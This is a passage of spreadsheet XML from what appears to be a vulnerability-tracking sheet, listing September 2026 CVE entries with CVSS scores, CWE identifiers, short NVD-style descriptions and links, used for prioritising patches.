      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79574</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79576</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79577</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65669</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81376</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-693</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S71"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T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82533</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S72"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T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62645</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62647</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S74"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T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69356</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76200</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S76"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76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76201</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S77"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77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78997</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S78"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T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67367</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S80"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T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84197</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297, CWE-300</t>
        </is>
      </c>
      <c r="S81"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T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62646</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="S82"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T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69641</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
